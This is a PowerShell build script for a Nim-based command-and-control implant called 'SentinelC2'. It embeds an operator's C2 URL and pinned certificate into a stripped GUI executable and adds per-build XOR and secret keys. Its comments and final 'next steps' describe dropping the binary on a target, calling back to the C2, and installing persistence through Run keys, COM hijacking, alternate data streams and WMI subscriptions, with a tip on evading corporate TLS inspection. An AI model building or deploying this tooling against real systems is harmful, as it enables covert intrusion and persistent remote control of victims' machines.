# build_deploy.ps1 — Build a single deployable SentinelC2 agent
#
# Produces a single .exe with the C2 URL and (optionally) the pinned
# TLS certificate baked into the binary. The result is a single file
# the operator drops on the target and runs with no arguments:
#
#   X:\path\agent_deployable.exe
#
# The agent will:
#   1. Connect to the C2 URL baked in at build time
#   2. Register with the operator's C2 server
#   3. Install all non-elevated persistence (Run key, COM hijack,
#      Startup folder, ADS backup)
#   4. Wait for operator commands
#
# Elevated persistence (WMI event subscription, mof-based backup) is
# only installed if the agent runs in an elevated context on the
# target. See DEPLOY.md for the full flow.
#
# Prerequisites:
#   - Nim 2.2.10 at D:\appdata\nim-2.2.10\bin\nim.exe (or set $env:NIM)
#   - nimcrypto, winim, ws (Nimble)
#   - MinGW gcc (for C codegen)
#   - TLS cert in PEM format (optional, but recommended for corp envs)
#
# Usage:
#   .\build_deploy.ps1 -C2Url "wss://c2.yourdomain.com:8443" `
#                       -CertFile "C:\certs\c2.pem" `
#                       -Variant "aggressive"
#
# Output: build\agent_deployable.exe

[CmdletBinding()]
param(
    [Parameter(Mandatory=$true)]
    [string]$C2Url,

    [string]$CertFile = "",

    [ValidateSet("silent","engagement","aggressive")]
    [string]$Variant = "aggressive",

    [string]$OutputDir = "",
    [string]$OutputName = ""
)

$ErrorActionPreference = "Stop"
$PSNativeCommandUseErrorActionPreference = $true

function Write-Utf8NoBom {
    param(
        [Parameter(Mandatory = $true)][string]$Path,
        [Parameter(Mandatory = $true)][string]$Content
    )
    [System.IO.File]::WriteAllText($Path, $Content, (New-Object System.Text.UTF8Encoding($false)))
}

$ProjectDir = $PSScriptRoot
$BuildDir = if ($OutputDir) { $OutputDir } else { Join-Path $ProjectDir "build" }
$SrcDir = $ProjectDir
$Nim = if ($env:NIM) { $env:NIM } else { "nim" }
$OverrideFile = Join-Path $ProjectDir "c2_override.nim"
$SecretFile = Join-Path $ProjectDir "secret.nim"

# ---- 1. Verify toolchain -----------------------------------------------
if (-not (Get-Command $Nim -ErrorAction SilentlyContinue)) {
    if (-not (Test-Path $Nim)) {
        Write-Error "nim not found. Set `$env:NIM or add nim to PATH."
        exit 1
    }
}
$NimVersion = & $Nim --version 2>&1 | Select-Object -First 1
Write-Host '[*] Nim:' $NimVersion -ForegroundColor Gray

if (-not (Test-Path $BuildDir)) {
    New-Item -ItemType Directory -Path $BuildDir | Out-Null
}

# ---- 2. Validate C2 URL ------------------------------------------------
if ($C2Url -notmatch '^(wss?)://[A-Za-z0-9\.\-]+(:[0-9]+)?(/.*)?$') {
    Write-Error "Invalid C2 URL: $C2Url (expected ws:// or wss:// scheme)"
    exit 1
}
Write-Host '[*] C2 URL:' $C2Url -ForegroundColor Cyan

# ---- 3. Read TLS cert (optional) --------------------------------------
$CertPemLiteral = ""
if ($CertFile -ne "") {
    if (-not (Test-Path $CertFile)) {
        Write-Error "Cert file not found: $CertFile"
        exit 1
    }
    $CertPem = Get-Content -Path $CertFile -Raw -Encoding UTF8
    if ($CertPem -notmatch '-----BEGIN CERTIFICATE-----') {
        Write-Error "Cert file does not look like PEM (no BEGIN CERTIFICATE marker)"
        exit 1
    }
    # Embed as a Nim triple-quoted string literal. We escape the rare
    # triple-quote char (if it appears) by splitting into two strings
    # and concatenating at compile time.
    $Escaped = $CertPem -replace '"""', '"" + char(34) + ""'
    $CertPemLiteral = @"
const PINNED_CERT_DEPLOY_PEM* = """$Escaped"""
"@
    Write-Host ('[*] Pinned cert: ' + $CertFile + ' (' + $CertPem.Length + ' bytes)') -ForegroundColor Cyan
} else {
    Write-Host '[!] No pinned cert -- agent will use system trust store' -ForegroundColor Yellow
    Write-Host '    (corp TLS-inspection proxies WILL MITM your C2 traffic)' -ForegroundColor Yellow
    $CertPemLiteral = ""
}

# ---- 4. Generate c2_override.nim ---------------------------------------
# This file is included at compile time by the hardened agent modules
# that need the C2 URL and (optionally) the pinned cert.
$OverrideContent = @"
# Auto-generated by build_deploy.ps1. Do NOT edit by hand.
# This file is regenerated on every build and removed after.
const C2_DEPLOY_URL* = "$C2Url"
$CertPemLiteral
"@
Write-Utf8NoBom -Path $OverrideFile -Content $OverrideContent
Write-Host ('[*] Generated ' + $OverrideFile) -ForegroundColor Gray

# ---- 5. Build flags ----------------------------------------------------
$BaseFlags = @(
    "c",
    "-d:release",
    "-d:ssl",
    "--opt:size",
    "--app:gui",
    "--passL:-s",
    "--passL:-lmingw32",
    "--passL:-lws2_32",
    "--passL:-lsecur32",
    "--passL:-lcrypt32",
    "--passL:-ladvapi32",
    "--passL:-lshell32",
    "--passL:-lole32",
    "--passL:-lntdll",
    "--passL:-liphlpapi",
    "--passL:-lwevtapi",
    "--hint:[Conf]:off",
    "--warning:[UnusedImport]:off",
    "--warning:[Deprecated]:off"
)

$VariantDefine = switch ($Variant) {
    "silent"     { @() }
    "engagement" { @("-d:variant_engagement") }
    "aggressive" { @("-d:variant_aggressive") }
    default      { @("-d:variant_aggressive") }
}

$OutName = if ($OutputName) { $OutputName } else { "agent_deployable.exe" }
$OutPath = Join-Path $BuildDir $OutName
$CacheDir = Join-Path $BuildDir ("cache_" + [System.IO.Path]::GetFileNameWithoutExtension($OutName))

$AllFlags = @() + $BaseFlags + $VariantDefine + @(
    "--path:" + (Join-Path $SrcDir "hardened"),
    "--include:" + $OverrideFile,
    "--nimcache:" + $CacheDir
)

# ---- 6. Generate per-build XOR key -------------------------------------
$XorKeyPath = Join-Path $SrcDir "xorkey.nim"
$rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
$keyBytes = New-Object byte[] 32
$rng.GetBytes($keyBytes)
$hexParts = @()
foreach ($b in $keyBytes) { $hexParts += ("0x{0:x2}" -f $b) }
$keyBody = $hexParts -join ", "
$xorKeyContent = "# Auto-generated per-build XOR key. Do NOT edit.`nconst XorKey: array[32, byte] = [byte $keyBody]`n"
Write-Utf8NoBom -Path $XorKeyPath -Content $xorKeyContent
if ($env:C2_AGENT_PASSPHRASE -and $env:C2_AGENT_PASSPHRASE -ne "") {
    $passphrase = $env:C2_AGENT_PASSPHRASE
} else {
    $secretBytes = New-Object byte[] 32
    $rng.GetBytes($secretBytes)
    $passphrase = -join ($secretBytes | ForEach-Object { '{0:x2}' -f $_ })
}
$escapedPassphrase = $passphrase.Replace('\', '\\').Replace('"', '\"')
Write-Utf8NoBom -Path $SecretFile -Content "const SECRET_PLAINTEXT* = `"$escapedPassphrase`"`n"

# ---- 7. Compile --------------------------------------------------------
Write-Host ('[*] Building ' + $OutName + ' (variant=' + $Variant + ') ...') -ForegroundColor Cyan

$prevEAP = $ErrorActionPreference
$ErrorActionPreference = "Continue"
& $Nim @AllFlags `
    --out:$OutPath `
    (Join-Path $SrcDir "hardened\agent_hardened.nim") 2>&1 | Out-Null
$ErrorActionPreference = $prevEAP

if ($LASTEXITCODE -ne 0) {
    Write-Warning "Build failed (exit $LASTEXITCODE)"
    if (Test-Path $XorKeyPath) { Move-Item $XorKeyPath -Destination "$env:TEMP\xorkey.nim" -Force }
    if (Test-Path $SecretFile) { Move-Item $SecretFile -Destination "$env:TEMP\secret.nim" -Force }
    if (Test-Path $OverrideFile) { Move-Item $OverrideFile -Destination "$env:TEMP\c2_override.nim" -Force }
    exit $LASTEXITCODE
}

# Move per-build artifacts out of the source tree (keep repo clean)
if (Test-Path $XorKeyPath) { Move-Item $XorKeyPath -Destination "$env:TEMP\xorkey_$(Get-Random).nim" -Force }
if (Test-Path $SecretFile) { Move-Item $SecretFile -Destination "$env:TEMP\secret_$(Get-Random).nim" -Force }
if (Test-Path $OverrideFile) { Move-Item $OverrideFile -Destination "$env:TEMP\c2_override_$(Get-Random).nim" -Force }

# ---- 8. Verify --------------------------------------------------------
if (-not (Test-Path $OutPath)) {
    Write-Error "Build succeeded but output file not found: $OutPath"
    exit 1
}
$size = (Get-Item $OutPath).Length
Write-Host ""
Write-Host '[+] Build complete' -ForegroundColor Green
Write-Host ('    Output:   ' + $OutPath) -ForegroundColor Green
Write-Host ('    Size:     ' + [math]::Round($size/1KB, 1) + ' KB') -ForegroundColor Green
Write-Host ('    Variant:  ' + $Variant) -ForegroundColor Green
Write-Host ('    C2 URL:   ' + $C2Url) -ForegroundColor Green
Write-Host ""

# ---- 9. Quick verification --------------------------------------------
# Confirm the URL is actually in the binary and not the default
$UrlBytes = [System.Text.Encoding]::UTF8.GetBytes($C2Url)
$DefaultBytes = [System.Text.Encoding]::UTF8.GetBytes("ws://127.0.0.1:8443")
$binContent = [System.IO.File]::ReadAllBytes($OutPath)
$hasUrl = $false
for ($i = 0; $i -le $binContent.Length - $UrlBytes.Length; $i++) {
    $match = $true
    for ($j = 0; $j -lt $UrlBytes.Length; $j++) {
        if ($binContent[$i + $j] -ne $UrlBytes[$j]) { $match = $false; break }
    }
    if ($match) { $hasUrl = $true; break }
}
if ($hasUrl) {
    Write-Host '[+] C2 URL verified in binary' -ForegroundColor Green
} else {
    Write-Warning "C2 URL not found in binary — build may have used the default"
}
$hasDefault = $false
for ($i = 0; $i -le $binContent.Length - $DefaultBytes.Length; $i++) {
    $match = $true
    for ($j = 0; $j -lt $DefaultBytes.Length; $j++) {
        if ($binContent[$i + $j] -ne $DefaultBytes[$j]) { $match = $false; break }
    }
    if ($match) { $hasDefault = $true; break }
}
if ($hasDefault) {
    Write-Warning "Default URL still present in binary — the override didn't take effect"
}

if ($CertFile -ne "") {
    $certMarker = "-----BEGIN CERTIFICATE-----"
    $markerBytes = [System.Text.Encoding]::UTF8.GetBytes($certMarker)
    $hasCert = $false
    for ($i = 0; $i -le $binContent.Length - $markerBytes.Length; $i++) {
        $match = $true
        for ($j = 0; $j -lt $markerBytes.Length; $j++) {
            if ($binContent[$i + $j] -ne $markerBytes[$j]) { $match = $false; break }
        }
        if ($match) { $hasCert = $true; break }
    }
    if ($hasCert) {
        Write-Host '[+] Pinned cert verified in binary' -ForegroundColor Green
    } else {
        Write-Warning "Pinned cert marker not found in binary"
    }
}

Write-Host ""
Write-Host "Next steps:" -ForegroundColor Yellow
Write-Host "  1. Drop $OutPath on the target"
Write-Host "  2. Run it (one command, no args): `"$OutName`""
Write-Host "  3. Watch your C2 server for the agent to register"
Write-Host "  4. Issue 'persist' from the C2 to install all persistence"
Write-Host ""
Write-Host "Test on a Win10/11 VM first. See DEPLOY.md for the full flow."
